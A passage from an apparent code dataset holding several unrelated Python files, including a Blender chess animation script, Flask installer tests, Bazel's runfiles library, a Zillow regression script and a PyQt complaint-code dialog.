'CHESS_FRACTURE_TEST' in os.environ and move_number > 10:\n print('Early exit because CHESS_FRACTURE_TEST is defined')\n break\n # end for moves\n \n # assign materials\n white_mat = bpy.data.materials.get('white')\n black_mat = bpy.data.materials.get('black')\n \n whites_re = re.compile(r'.*white.*')\n blacks_re = re.compile(r'.*black.*')\n for obj in bpy.data.objects:\n if whites_re.match(obj.name):\n obj.data.materials.append(white_mat)\n elif blacks_re.match(obj.name):\n obj.data.materials.append(black_mat)\n\n # interpolation method\n piece_re = re.compile(r'.*[a-h]\\d$')\n for o in bpy.data.objects:\n if piece_re.match(o.name) and hasattr(o.animation_data, 'action'):\n fcurves = o.animation_data.action.fcurves\n\n print('curve: ' + str(o.name))\n for fcurve in fcurves:\n for kf in fcurve.keyframe_points:\n kf.interpolation = 'SINE'\n\n # compute some stats\n end_time = time.time()\n duration = end_time - start_time\n print()\n print('Duration: ' + str(duration))\n # end def play\n\n\ndef get_env_or_default(name, default):\n if name in os.environ:\n return os.environ[name]\n else:\n return default\n\n\ndef main():\n if 'CHESS_FRACTURE_TEST_FAIL' in os.environ:\n print('CHESS_FRACTURE_TEST_FAIL')\n sys.exit(EXIT_CODES['CHESS_FRACTURE_TEST_FAIL'])\n\n frames_per_move = int(get_env_or_default('CHESS_FRACTURE_FRAMES_PER_MOVE', 20))\n print(\"CHESS_FRACTURE_FRAMES_PER_MOVE=\" + str(frames_per_move))\n\n n_fragments = int(get_env_or_default('CHESS_FRACTURE_FRAGMENTS', 10))\n print(\"CHESS_FRACTURE_FRAGMENTS=\" + str(n_fragments))\n\n pgn_path = get_env_or_default('CHESS_FRACTURE_PGN_PATH', '/work/input.pgn')\n game = load_pgn(pgn_path)\n\n variant = game.board().uci_variant\n if variant != 'chess' or game.board().chess960:\n sys.stdout.write('Unsupported game type {}\\n'.format(variant))\n sys.exit(EXIT_CODES['UNSUPPORTED_VARIANT'])\n\n board_map = initial_setup()\n print('Board setup done')\n\n try:\n play(board_map, game, frames_per_move, n_fragments)\n print('Simulation done')\n except Exception as e:\n print('Simulation failed')\n traceback.print_exc()\n sys.exit(EXIT_CODES['SIMULATION_FAILED'])\n\n try:\n if 'CHESS_FRACTURE_OUT_BLEND' in os.environ:\n save_file = os.environ['CHESS_FRACTURE_OUT_BLEND']\n \n bpy.ops.wm.save_as_mainfile(filepath=save_file)\n \n print('File saved as \"{}\"'.format(save_file))\n \n sys.exit(EXIT_CODES['OK']) # happy path\n except Exception as e:\n print('Save failed ' + str(e))\n traceback.print_exc()\n sys.exit(EXIT_CODES['SAVE_FAILED'])\n # end def main\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as e:\n print('main failed :' + str(e))\n traceback.print_exc()\n sys.exit(EXIT_CODES['UNKNOWN'])\n","sub_path":"blender/chess_fracture_2.80.py","file_name":"chess_fracture_2.80.py","file_ext":"py","file_size_in_byte":20634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"274969382","text":"from decimal import Decimal as dec, getcontext\n\ndef leibniz(limit, prec):\n\tgetcontext().prec = prec\n\n\tlimit += 1\n\tnumerator = dec(4)\n\tpi = dec(0)\n\n\tfor n in range(1, limit, 2):\n\t\tpi += numerator / n\n\t\tnumerator = -numerator\n\n\treturn dec(pi)\n\nif __name__ == '__main__':\n\tpi = leibniz(200, 200)\n\n\twith open('leibniz_pi.txt', 'w') as f:\n\t f.write(str(pi))\n","sub_path":"other/calculate_pi/leibniz.py","file_name":"leibniz.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"49106601","text":"import abc\nimport asyncio\nimport logging\nfrom typing import Optional\n\nfrom aiokafka import AIOKafkaProducer\n\nfrom settings import settings\n\n\nclass AbstractEventStorage(abc.ABC):\n @abc.abstractmethod\n def send(self, *args, **kwargs):\n pass\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass KafkaEventStorage(AbstractEventStorage):\n def __init__(self, producer: AIOKafkaProducer):\n self.producer = producer\n\n async def send(self, topic: str, value: str, key: str, *args, **kwargs):\n try:\n print(f'Sending {topic}, {value}, {key}')\n await self.producer.send_and_wait(topic=topic, value=value, key=key)\n except Exception as e:\n logger.exception(e)\n\n\nevent_storage: Optional[AbstractEventStorage] = None\n\n\nasync def get_event_storage() -> AbstractEventStorage:\n global event_storage\n if not event_storage:\n loop = asyncio.get_event_loop()\n # Set max_batch_size and linger_ms to manage batch sending\n kafka_producer = AIOKafkaProducer(loop=loop,\n bootstrap_servers=settings.kafka_bootstrap_servers)\n await kafka_producer.start()\n event_storage = KafkaEventStorage(producer=kafka_producer)\n return event_storage\n","sub_path":"kafka-api/src/db/events_storage.py","file_name":"events_storage.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"617112710","text":"import RPi.GPIO as GPIO\nimport time\n\nFAN_1 = 22\nFAN_2 = 27\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(FAN_1, GPIO.OUT)\nGPIO.setup(FAN_2, GPIO.OUT)\n\ndef action(command):\n if command == \"true\":\n print(\"true\")\n runFan()\n elif command == \"false\":\n print(\"false\")\n stopFan()\n \n\ndef runFan():\n\n GPIO.output(FAN_1, GPIO.HIGH)\n GPIO.output(FAN_2, GPIO.LOW)\n\ndef stopFan():\n\n GPIO.output(FAN_1, GPIO.LOW)\n GPIO.output(FAN_2, GPIO.LOW)\n\n","sub_path":"main/python/Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587663294","text":"import os\nimport pytest\nimport bcrypt\nfrom configparser import ConfigParser\nfrom flask import Flask\nfrom peewee import SqliteDatabase\n\nfrom sebureem.setup_app import setup_app\nfrom sebureem.models import Sebura, Sebuks\n\n@pytest.fixture(scope='module')\ndef setup_app_fix():\n app = Flask(__name__)\n app.secret_key = \"Sebureem test secret_key\"\n app.register_blueprint(setup_app)\n yield app.test_client()\n\n@pytest.fixture()\ndef setup_config_dir(tmpdir):\n if os.name == \"posix\":\n os.environ['XDG_CONFIG_HOME'] = str(tmpdir)\n elif os.name == \"nt\":\n os.environ['LOCALAPPDATA'] = str(tmpdir)\n yield tmpdir.join('sebureem')\n\n@pytest.fixture()\ndef create_config_file(setup_config_dir):\n config_file = setup_config_dir.join('sebureem.ini')\n config_file.write(\"# Sebureem config file\", ensure=True)\n yield config_file\n\n@pytest.fixture()\ndef create_db(setup_config_dir):\n db_file = setup_config_dir.join('sebureem_test.db')\n print(db_file)\n db = SqliteDatabase(str(db_file))\n db.connect()\n db.create_tables([Sebura, Sebuks], safe=True)\n db.close()\n yield db_file\n\nclass TestSetupApp:\n\n def test_app_running(self, setup_app_fix):\n ret = setup_app_fix.get(\"/install/\")\n assert b\"Sebureem installer\" in ret.data\n\n def test_set_config_file(self, setup_app_fix, setup_config_dir):\n config_file = setup_config_dir.join('sebureem.ini')\n ret = setup_app_fix.get(\"install/config/\")\n assert b\"Config file created\" in ret.data\n assert \"# Sebureem config file\" in config_file.read()\n\n def test_create_config_file_exists(self, setup_app_fix, create_config_file):\n config_file = create_config_file\n assert \"# Sebureem config file\" in config_file.read()\n ret = setup_app_fix.get(\"install/config/\")\n assert b\"Warning: Config file found\" in ret.data\n\n def test_create_config_dir_exists(self, setup_app_fix, setup_config_dir):\n config_dir = setup_config_dir\n config_dir.mkdir()\n ret = setup_app_fix.get(\"install/config/\")\n config_file = setup_config_dir.join('sebureem.ini')\n assert b\"Config file created\" in ret.data\n assert \"# Sebureem config file\" in config_file.read()\n\n def test_set_db_path(self, setup_app_fix, tmpdir):\n ret = setup_app_fix.get(\"install/database/\")\n assert b\"Creating database\" in ret.data\n\n def test_create_db(self, setup_app_fix, create_config_file, tmpdir):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n db_path = tmpdir.join('sebureem')\n ret = setup_app_fix.post('/install/database/', data={\n 'db_path' : str(db_path),\n 'db_name': 'sebureem_test.db'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['DATABASE']['path'] == str(\n db_path.join('sebureem_test.db')\n )\n assert db_path.join('sebureem_test.db').check(file=True)\n assert b\"Database created\" in ret.data\n\n def test_create_db_exists(self, setup_app_fix, create_config_file, create_db, tmpdir):\n conf_path = create_config_file\n db_path = create_db\n print(str(db_path))\n test_conf = ConfigParser(allow_no_value=True)\n\n ret = setup_app_fix.post('/install/database/', data={\n 'db_path' : str(db_path),\n 'db_name': 'sebureem_test.db'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['DATABASE']['path'] == str(\n db_path.join('sebureem_test.db')\n )\n assert db_path.check(file=True)\n assert b\"Database already present at this location\" in ret.data\n\n def test_set_admin(self, setup_app_fix):\n ret = setup_app_fix.get(\"install/admin/\")\n assert b\"Admin account creation\" in ret.data\n\n def test_create_admin(self, setup_app_fix, create_config_file):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n ret = setup_app_fix.post('/install/admin/', data={\n 'admin_login' : 'admin',\n 'admin_passwd': 'admin'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['ADMIN']['login'] == 'admin'\n assert bcrypt.checkpw(b'admin', bytes(test_conf['ADMIN']['passwd'], 'utf-8')) \n assert b\"Admin account created\" in ret.data\n\n def test_set_site(self, setup_app_fix):\n ret = setup_app_fix.get(\"install/site/\")\n assert b\"Creating site\" in ret.data\n\n def test_create_site(self, setup_app_fix, create_config_file):\n conf_path = create_config_file\n test_conf = ConfigParser(allow_no_value=True)\n ret = setup_app_fix.post('/install/site/', data={\n 'site_name' : 'foo',\n 'site_url': 'https://exemple.com'\n })\n test_conf.read_file(conf_path.readlines())\n assert test_conf['foo']['url'] == 'https://exemple.com'\n assert b\"Site configured\" in ret.data\n","sub_path":"tests/test_setup_app.py","file_name":"test_setup_app.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"150216250","text":"###############################################################\n# Author: Morgan Frisby\n# User: \tAngela Kang\n# Purpose: Assist in the blinding process of OJ applications\n# Date: \tFebruary 17, 2019\n###############################################################\n\n\nimport os\nimport sys\nfrom shutil import copyfile\nfrom operator import itemgetter\nimport csv\n\n\"\"\"\nORIGINAL_DIR - the name of the downloaded folder that has the original application files.\nBLINDED_DIR - the name of the folder that will have the blinded application files.\n\"\"\"\nORIGINAL_DIR = \"test_files\" # <-- change this!\nBLINDED_DIR = \"testing\" # <------ change this!\n\n\ndef create_folder(folder_name):\n \"\"\" Creates a new folder in the current working directory. \"\"\"\n try:\n if not os.path.exists(folder_name):\n os.mkdir(f\"{folder_name}/\")\n print(f\"Successfully created the folder {folder_name}.\")\n else:\n print(f\"Error: The folder {folder_name} already exists.\")\n except OSError:\n print(f\"Error: Could not create the folder {folder_name}.\")\n\n\ndef remove_folder(folder_name):\n \"\"\" Removes the folder from the current working directory. \"\"\"\n try:\n if not os.path.exists(folder_name):\n print(f\"Error: The folder {folder_name} does not exist.\")\n else:\n os.rmdir(f\"{folder_name}/\")\n print(f\"Successfully deleted the folder {folder_name}.\")\n except OSError:\n print(f\"Error: Could not remove the folder{folder_name}.\")\n\n\ndef copy_files(input_folder, output_folder):\n \"\"\" Parses the files in input_folder alphabetically, renames them based on the convention MCB_ and\n copies the renamed files to output_folder. \"\"\"\n\n input_path = os.path.join(os.getcwd(), input_folder)\n output_path = os.path.join(os.getcwd(), output_folder)\n input_files = os.listdir(input_path)\n index = 1\n output_dir = {}\n\n for filename in sorted(input_files, key=itemgetter(0)):\n if not filename.startswith(\".\"):\n renamed = \"MCB_\" + str(index)\n source = os.path.join(input_path, filename)\n target = os.path.join(output_path, renamed)\n try:\n copyfile(source, target)\n except IOError as e:\n print(f\"Unable to copy file. Error: {e}\")\n sys.exit(1)\n except:\n print(\"Unexpected error:\", sys.exc_info())\n sys.exit(1)\n\n print(f\"\\n File {filename} successfully copied as {renamed}. \\n\")\n output_dir[filename] = renamed\n index += 1\n print(f\"mapping is {output_dir}.\")\n\n with open(\"blinded.csv\", \"w\") as output:\n writer = csv.writer(output)\n for orig, blind in output_dir.items():\n writer.writerow([orig, blind])\n\n\nif __name__ == \"__main__\":\n create_folder(BLINDED_DIR)\n # remove_folder(BLINDED_DIR)\n copy_files(ORIGINAL_DIR, BLINDED_DIR)\n","sub_path":"blind.py","file_name":"blind.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"282040344","text":"# Copyright 2018 The Bazel Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n###############################################################################\n# Vendored in from bazelbuild/bazel (tools/python/runfiles/runfiles.py) at #\n# commit 6c60a8ec049b6b8540c473969dd7bd1dad46acb9 (2019-07-19). See #\n# //python/runfiles:BUILD for details. #\n###############################################################################\n\n\"\"\"Runfiles lookup library for Bazel-built Python binaries and tests.\n\nUSAGE:\n\n1. Depend on this runfiles library from your build rule:\n\n py_binary(\n name = \"my_binary\",\n ...\n deps = [\"@bazel_tools//tools/python/runfiles\"],\n )\n\n2. Import the runfiles library.\n\n from bazel_tools.tools.python.runfiles import runfiles\n\n3. Create a Runfiles object and use rlocation to look up runfile paths:\n\n r = runfiles.Create()\n ...\n with open(r.Rlocation(\"my_workspace/path/to/my/data.txt\"), \"r\") as f:\n contents = f.readlines()\n ...\n\n The code above creates a manifest- or directory-based implementations based\n on the environment variables in os.environ. See `Create()` for more info.\n\n If you want to explicitly create a manifest- or directory-based\n implementations, you can do so as follows:\n\n r1 = runfiles.CreateManifestBased(\"path/to/foo.runfiles_manifest\")\n\n r2 = runfiles.CreateDirectoryBased(\"path/to/foo.runfiles/\")\n\n If you want to start subprocesses that also need runfiles, you need to set\n the right environment variables for them:\n\n import subprocess\n from bazel_tools.tools.python.runfiles import runfiles\n\n r = runfiles.Create()\n env = {}\n ...\n env.update(r.EnvVars())\n p = subprocess.Popen([r.Rlocation(\"path/to/binary\")], env, ...)\n\"\"\"\n\nimport os\nimport posixpath\n\nif False:\n # Mypy needs these symbols imported, but since they only exist in python 3.5+,\n # this import may fail at runtime. Luckily mypy can follow this conditional import.\n from typing import Callable, Dict, Optional, Tuple, Union\n\ndef CreateManifestBased(manifest_path):\n # type: (str) -> _Runfiles\n return _Runfiles(_ManifestBased(manifest_path))\n\n\ndef CreateDirectoryBased(runfiles_dir_path):\n # type: (str) -> _Runfiles\n return _Runfiles(_DirectoryBased(runfiles_dir_path))\n\n\ndef Create(env=None):\n # type: (Optional[Dict[str, str]]) -> Optional[_Runfiles]\n \"\"\"Returns a new `Runfiles` instance.\n\n The returned object is either:\n - manifest-based, meaning it looks up runfile paths from a manifest file, or\n - directory-based, meaning it looks up runfile paths under a given directory\n path\n\n If `env` contains \"RUNFILES_MANIFEST_FILE\" with non-empty value, this method\n returns a manifest-based implementation. The object eagerly reads and caches\n the whole manifest file upon instantiation; this may be relevant for\n performance consideration.\n\n Otherwise, if `env` contains \"RUNFILES_DIR\" with non-empty value (checked in\n this priority order), this method returns a directory-based implementation.\n\n If neither cases apply, this method returns null.\n\n Args:\n env: {string: string}; optional; the map of environment variables. If None,\n this function uses the environment variable map of this process.\n Raises:\n IOError: if some IO error occurs.\n \"\"\"\n env_map = os.environ if env is None else env\n manifest = env_map.get(\"RUNFILES_MANIFEST_FILE\")\n if manifest:\n return CreateManifestBased(manifest)\n\n directory = env_map.get(\"RUNFILES_DIR\")\n if directory:\n return CreateDirectoryBased(directory)\n\n return None\n\n\nclass _Runfiles(object):\n \"\"\"Returns the runtime location of runfiles.\n\n Runfiles are data-dependencies of Bazel-built binaries and tests.\n \"\"\"\n\n def __init__(self, strategy):\n # type: (Union[_ManifestBased, _DirectoryBased]) -> None\n self._strategy = strategy\n\n def Rlocation(self, path):\n # type: (str) -> Optional[str]\n \"\"\"Returns the runtime path of a runfile.\n\n Runfiles are data-dependencies of Bazel-built binaries and tests.\n\n The returned path may not be valid. The caller should check the path's\n validity and that the path exists.\n\n The function may return None. In that case the caller can be sure that the\n rule does not know about this data-dependency.\n\n Args:\n path: string; runfiles-root-relative path of the runfile\n Returns:\n the path to the runfile, which the caller should check for existence, or\n None if the method doesn't know about this runfile\n Raises:\n TypeError: if `path` is not a string\n ValueError: if `path` is None or empty, or it's absolute or not normalized\n \"\"\"\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n if (\n path.startswith(\"../\")\n or \"/..\" in path\n or path.startswith(\"./\")\n or \"/./\" in path\n or path.endswith(\"/.\")\n or \"//\" in path\n ):\n raise ValueError('path is not normalized: \"%s\"' % path)\n if path[0] == \"\\\\\":\n raise ValueError('path is absolute without a drive letter: \"%s\"' % path)\n if os.path.isabs(path):\n return path\n return self._strategy.RlocationChecked(path)\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n \"\"\"Returns environment variables for subprocesses.\n\n The caller should set the returned key-value pairs in the environment of\n subprocesses in case those subprocesses are also Bazel-built binaries that\n need to use runfiles.\n\n Returns:\n {string: string}; a dict; keys are environment variable names, values are\n the values for these environment variables\n \"\"\"\n return self._strategy.EnvVars()\n\n\nclass _ManifestBased(object):\n \"\"\"`Runfiles` strategy that parses a runfiles-manifest to look up runfiles.\"\"\"\n\n def __init__(self, path):\n # type: (str) -> None\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n self._path = path\n self._runfiles = _ManifestBased._LoadRunfiles(path)\n\n def RlocationChecked(self, path):\n # type: (str) -> Optional[str]\n return self._runfiles.get(path)\n\n @staticmethod\n def _LoadRunfiles(path):\n # type: (str) -> Dict[str, str]\n \"\"\"Loads the runfiles manifest.\"\"\"\n result = {}\n with open(path, \"r\") as f:\n for line in f:\n line = line.strip()\n if line:\n tokens = line.split(\" \", 1)\n if len(tokens) == 1:\n result[line] = line\n else:\n result[tokens[0]] = tokens[1]\n return result\n\n def _GetRunfilesDir(self):\n # type: () -> str\n if self._path.endswith(\"/MANIFEST\") or self._path.endswith(\"\\\\MANIFEST\"):\n return self._path[: -len(\"/MANIFEST\")]\n elif self._path.endswith(\".runfiles_manifest\"):\n return self._path[: -len(\"_manifest\")]\n else:\n return \"\"\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n directory = self._GetRunfilesDir()\n return {\n \"RUNFILES_MANIFEST_FILE\": self._path,\n \"RUNFILES_DIR\": directory,\n # TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can\n # pick up RUNFILES_DIR.\n \"JAVA_RUNFILES\": directory,\n }\n\n\nclass _DirectoryBased(object):\n \"\"\"`Runfiles` strategy that appends runfiles paths to the runfiles root.\"\"\"\n\n def __init__(self, path):\n # type: (str) -> None\n if not path:\n raise ValueError()\n if not isinstance(path, str):\n raise TypeError()\n self._runfiles_root = path\n\n def RlocationChecked(self, path):\n # type: (str) -> str\n\n # Use posixpath instead of os.path, because Bazel only creates a runfiles\n # tree on Unix platforms, so `Create()` will only create a directory-based\n # runfiles strategy on those platforms.\n return posixpath.join(self._runfiles_root, path)\n\n def EnvVars(self):\n # type: () -> Dict[str, str]\n return {\n \"RUNFILES_DIR\": self._runfiles_root,\n # TODO(laszlocsomor): remove JAVA_RUNFILES once the Java launcher can\n # pick up RUNFILES_DIR.\n \"JAVA_RUNFILES\": self._runfiles_root,\n }\n\n\ndef _PathsFrom(\n argv0, runfiles_mf, runfiles_dir, is_runfiles_manifest, is_runfiles_directory\n):\n # type: (str, str, str, Callable[[str], bool], Callable[[str], bool]) -> Tuple[str, str]\n \"\"\"Discover runfiles manifest and runfiles directory paths.\n\n Args:\n argv0: string; the value of sys.argv[0]\n runfiles_mf: string; the value of the RUNFILES_MANIFEST_FILE environment\n variable\n runfiles_dir: string; the value of the RUNFILES_DIR environment variable\n is_runfiles_manifest: lambda(string):bool; returns true if the argument is\n the path of a runfiles manifest file\n is_runfiles_directory: lambda(string):bool; returns true if the argument is\n the path of a runfiles directory\n\n Returns:\n (string, string) pair, first element is the path to the runfiles manifest,\n second element is the path to the runfiles directory. If the first element\n is non-empty, then is_runfiles_manifest returns true for it. Same goes for\n the second element and is_runfiles_directory respectively. If both elements\n are empty, then this function could not find a manifest or directory for\n which is_runfiles_manifest or is_runfiles_directory returns true.\n \"\"\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n dir_valid = is_runfiles_directory(runfiles_dir)\n\n if not mf_alid and not dir_valid:\n runfiles_mf = argv0 + \".runfiles/MANIFEST\"\n runfiles_dir = argv0 + \".runfiles\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n dir_valid = is_runfiles_directory(runfiles_dir)\n if not mf_alid:\n runfiles_mf = argv0 + \".runfiles_manifest\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n\n if not mf_alid and not dir_valid:\n return (\"\", \"\")\n\n if not mf_alid:\n runfiles_mf = runfiles_dir + \"/MANIFEST\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n if not mf_alid:\n runfiles_mf = runfiles_dir + \"_manifest\"\n mf_alid = is_runfiles_manifest(runfiles_mf)\n\n if not dir_valid:\n runfiles_dir = runfiles_mf[:-9] # \"_manifest\" or \"/MANIFEST\"\n dir_valid = is_runfiles_directory(runfiles_dir)\n\n return (runfiles_mf if mf_alid else \"\", runfiles_dir if dir_valid else \"\")\n","sub_path":"maistra/vendor/rules_python/python/runfiles/runfiles.py","file_name":"runfiles.py","file_ext":"py","file_size_in_byte":11511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571836548","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nimport pandas as pd\nimport numpy as np\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.preprocessing import StandardScaler\nimport time\n\n\"\"\"\nCreated on Wed Sep 6 19:31:24 2017\n\n@author: jkr\n\"\"\"\n\n\nGB_params={'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\nlog_errors=pd.read_csv(\"~/Documents/Machine Learning/Zillow/train_2016_v2.csv\", low_memory=False)\nPredictions=pd.DataFrame(columns=['parcelid', 'prediction', 'month', 'year'])\nstart_time=time.time()\nfor Data in pd.read_csv(\"~/Documents/Machine Learning/Zillow/properties_2016.csv\",\n low_memory=False, chunksize=2*10**5):\n HT_mask=Data.hashottuborspa =='nan'\n Data.loc[HT_mask,'hashottuborspa']=0\n Data.loc[~HT_mask,'hashottuborspa']=1\n \n FP_mask=Data.fireplaceflag == 'nan'\n Data.loc[FP_mask, 'fireplaceflag']=0\n Data.loc[~FP_mask, 'fireplaceflag']=1\n \n TD_mask=Data.taxdelinquencyflag == 'nan'\n Data.loc[TD_mask, 'taxdelinquencyflag']=0\n Data.loc[~TD_mask, 'taxdelinquencyflag']=1\n ls=list(Data)\n GB_params={'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\n for to_predict in ls:\n msk=Data[to_predict].notnull()\n Non_null_data=Data[msk].copy()\n if (len(Non_null_data)>=10) and (to_predict!='propertycountylandusecode'):\n Non_null_data=Non_null_data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n if len(Non_null_data)<100000 and len(Non_null_data)>100:\n int_msk=np.random.rand(len(Non_null_data))<0.4\n train_y=Non_null_data[to_predict][int_msk].copy()\n test_y=Non_null_data[to_predict][~int_msk].copy()\n del Non_null_data[to_predict]\n a=StandardScaler().fit(Non_null_data)\n Non_null_data=pd.DataFrame(a.transform(Non_null_data), columns=list(Non_null_data))\n int_train=Non_null_data[int_msk]\n int_test=Non_null_data[~int_msk]\n GB_CV=GridSearchCV(GradientBoostingRegressor(), GB_params).fit(int_train, train_y)\n score=GB_CV.score(int_test, test_y)\n print(to_predict+\" \"+str(score))\n if score>=0:\n Null_data=Data[~msk].copy()\n del Null_data[to_predict]\n Null_data=Null_data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n Null_data=Null_data.fillna(value=0)\n Null_data=pd.DataFrame(a.transform(Null_data), columns=list(Null_data))\n Imputations=GB_CV.predict(Null_data)\n Data.loc[~msk, to_predict]=Imputations\n Data=Data.apply(pd.to_numeric, args=('coerce',)).fillna(value=0)\n labeled_data=pd.merge(Data, log_errors, how='inner', on='parcelid')\n transaction_dates=labeled_data['transactiondate']\n labeled_data['transactiondate']=pd.to_datetime(labeled_data['transactiondate'])\n labeled_data['month']=labeled_data['transactiondate'].apply(lambda x: x.month)\n labeled_data['year']=labeled_data['transactiondate'].apply(lambda x: x.year)\n del labeled_data['transactiondate']\n Train_data=labeled_data[np.random.rand(len(labeled_data))<.8]\n Test_data=labeled_data[np.random.rand(len(labeled_data))>.8]\n Train_y=Train_data['logerror']\n Test_y=Test_data['logerror']\n del Train_data['logerror']\n del Test_data['logerror']\n IDs=labeled_data['parcelid']\n del Train_data['parcelid']\n del Test_data['parcelid']\n scaler=StandardScaler().fit(Train_data)\n Train_data=pd.DataFrame(scaler.transform(Train_data), columns=list(Train_data))\n Test_data=pd.DataFrame(scaler.transform(Test_data), columns=list(Test_data))\n GB_params={'loss': ['ls', 'lad', 'huber', 'quantile'], 'learning_rate':[0.1, 0.2, 0.5], 'n_estimators':[50, 100, 150, 200], \n 'max_depth':[2, 3, 5, 10]}\n Production_GB=GridSearchCV(GradientBoostingRegressor(), GB_params).fit(Train_data, Train_y)\n score=np.mean(np.abs(Production_GB.predict(Test_data)-Test_y))\n print(\"Validation MAE is \"+str(score))\n Data_IDs=pd.DataFrame(Data['parcelid'])\n del Data['parcelid']\n Data_to_precdict=pd.DataFrame(columns=list(Data)) \n for month in [10, 11, 12]:\n for year in [2016, 2017]:\n Data_to_concat=Data.copy()\n Data_to_concat['month']=month\n Data_to_concat['year']=year\n Data_to_predict=scaler.transform(Data_to_concat)\n preds=Production_GB.predict(Data_to_predict)\n Data_IDs['prediction']=preds\n Data_IDs['month']=[month]*len(Data_IDs)\n Data_IDs['year']=[year]*len(Data_IDs)\n Data_IDs['prediction']=preds\n Predictions=pd.concat([Predictions, Data_IDs])\n \n ","sub_path":"FillingAndPredictiong.py","file_name":"FillingAndPredictiong.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506749023","text":"import module.common as common\nfrom collections import OrderedDict\n\nfrom PyQt4 import QtCore, QtGui\n\nfrom widget.dialogs.selectClassificationCode.ui.ui_selectClassificationCodeDialog import Ui_selectClassificationCodeDialog\n\nclass SelectClassificationCodeDialog(QtGui.QDialog, Ui_selectClassificationCodeDialog):\n def __init__(self, parent = None):\n super(SelectClassificationCodeDialog, self).__init__(parent)\n\n # Initialize UI\n self.setupUi(self)\n\n # Initialize signals\n self.initialize_signals()\n\n # Initialize data\n self.initialize_data()\n\n def initialize_signals(self):\n self.lineEdit.textChanged.connect(self.on_lineEdit_textChange)\n self.listWidget.currentItemChanged.connect(self.on_listWidget_currentItemChange)\n self.buttonBox.accepted.connect(self.on_buttonBox_accept)\n self.buttonBox.rejected.connect(self.on_buttonBox_reject)\n\n def initialize_data(self):\n self.data = OrderedDict()\n self.data['001 No Initial Calibration'] = 'Complaint'\n self.data['006 Intermittent Antenna Icon'] = 'Complaint'\n self.data['007 Unrecoverable Loss of Antenna Passed Threshold '] = 'Complaint'\n self.data['009 Physical Damage - Applicator '] = 'Complaint'\n self.data['010 Difficulty with Deployment'] = 'Complaint'\n self.data['012 Inaccurate CGM Values'] = 'Complaint'\n self.data['013 ESS Prior to DBD Prompt'] = 'Complaint'\n self.data['017 Broken Receiver Case Clip/General Case Defect'] = 'Complaint'\n self.data['020 Painful Insertion '] = 'Complaint'\n self.data['021 Skin Reaction'] = 'Complaint'\n self.data['022 Discomfort During Use'] = 'Complaint'\n self.data['023 Would Not Accept Calibration'] = 'Complaint'\n self.data['024 Item Missing From Kit'] = 'Complaint'\n self.data['025 Poor Patch Adhesion'] = 'Complaint'\n self.data['028 Receiver Does Not Hold Charge'] = 'Complaint'\n self.data['029 Receiver Will Not Turn On'] = 'Complaint'\n self.data['030 Receiver Operates Only When Connected to Charger'] = 'Complaint'\n self.data['031 Receiver Display Malfunction'] = 'Complaint'\n self.data['032 Cable Difficult to Connect/Remove'] = 'Complaint'\n self.data['036 Physical Damage - Receiver '] = 'Complaint'\n self.data['037 Misc. Firmware'] = 'Complaint'\n self.data['040 Receiver Stuck on Initialization Screen'] = 'Complaint'\n self.data['041 Receiver Will Not Charge'] = 'Complaint'\n self.data['042 ??? or Hour Glass Icon in Status Box'] = 'Complaint'\n self.data['045 Other'] = 'Complaint'\n self.data['046 Patch without Adhesive'] = 'Complaint'\n self.data['047 Difficulty Inserting TX Into Sensor Pod'] = 'Complaint'\n self.data['048 Broken Sensor Wire'] = 'Complaint'\n self.data['049 Buttons Do Not Respond'] = 'Complaint'\n self.data['050 Initializing Screen Without Manual Restart'] = 'Complaint'\n self.data['051 No Receiver Display Except Backlight'] = 'Complaint'\n self.data['052 Receiver 